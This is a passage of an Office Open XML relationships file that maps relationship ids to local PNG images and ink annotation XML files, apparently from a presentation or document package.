Target="../media/image711.png"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1510.png"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1060.xml"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2210.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1340.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1420.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink953.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink954.xml"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1570.png"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink968.xml"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink976.xml"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1700.png"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink989.xml"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1900.png"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1062.xml"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1073.xml"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image930.png"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1780.png"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink997.xml"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1980.png"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1010.xml"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1012.xml"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2050.png"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1025.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink940.xml"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2130.png"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1031.xml"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2230.png"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2312.png"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image294.png"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1055.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1290.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1370.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink948.xml"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1520.png"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink963.xml"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1650.png"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink984.xml"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1860.png"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1010.png"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1068.xml"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image881.png"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image960.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1260.png"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink957.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1512.png"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink971.xml"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1730.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink992.xml"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1930.png"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1005.xml"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1020.xml"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2080.png"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2160.png"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1028.xml"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2260.png"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1039.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1100.png"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1050.xml"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1810.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink943.xml"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1600.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink979.xml"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1812.png"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image512.png"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1058.xml"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2010.png"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1065.xml"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image912.png"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1076.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1320.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink951.xml"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1460.png"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink966.xml"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1680.png"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink987.xml"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1880.png"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1000.xml"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1008.xml"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1015.xml"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1960.png"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2030.png"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2112.png"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1023.xml"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2212.png"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1034.xml"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1045.xml"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1310.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink938.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1400.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1550.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink974.xml"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1042.xml"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1053.xml"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image861.png"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1071.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1270.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink946.xml"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1490.png"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink960.xml"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink961.xml"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1630.png"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink982.xml"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1760.png"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1840.png"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink995.xml"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1003.xml"/><Relationship Id="rId334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1079.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1240.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink935.xml"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1912.png"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2060.png"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1018.xml"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2190.png"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2290.png"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image810.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1350.png"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1026.xml"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1037.xml"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1048.xml"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1610.png"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1066.xml"/><Relationship Id="rId329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image940.png"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink955.xml"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1580.png"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink977.xml"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1790.png"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink998.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2310.png"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1990.png"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2012.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1300.png"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1021.xml"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1032.xml"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2320.png"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1110.png"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image891.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink949.xml"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1530.png"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink972.xml"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1740.png"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1077.xml"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1470.png"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink993.xml"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1940.png"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1016.xml"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2170.png"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2270.png"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image611.png"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1059.xml"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image841.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink944.xml"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink967.xml"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1690.png"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1072.xml"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink988.xml"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1890.png"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1009.xml"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1011.xml"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2120.png"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2220.png"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1043.xml"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1054.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink939.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1412.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink962.xml"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1640.png"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1067.xml"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink956.xml"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink983.xml"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1850.png"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1004.xml"/><Relationship Id="rId331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image950.png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2070.png"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1027.xml"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1038.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1360.png"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1590.png"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1049.xml"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1710.png"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1910.png"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink978.xml"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1800.png"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink999.xml"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2000.png"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image901.png"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2020.png"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1022.xml"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1033.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1312.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink950.xml"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1044.xml"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1210.png"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1540.png"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink973.xml"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1750.png"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink994.xml"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1950.png"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image851.png"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1078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17.xml"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1208.xml"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1210.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1089.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1430.png"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1712.png"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1138.xml"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image901.png"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image520.png"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1154.xml"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1161.xml"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2140.png"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2240.png"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1112.xml"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image294.png"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1203.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1084.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1380.png"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1660.png"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1133.xml"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image851.png"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1226.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1081.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1106.xml"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1820.png"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1149.xml"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2090.png"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1177.xml"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1188.xml"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1198.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1330.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1100.xml"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1612.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1128.xml"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1310.png"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2010.png"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1221.xml"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1770.png"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1144.xml"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1970.png"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2040.png"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1172.xml"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1183.xml"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1193.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1280.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1095.xml"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1560.png"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1123.xml"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image810.png"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1216.xml"/><Relationship Id="rId336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image960.png"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 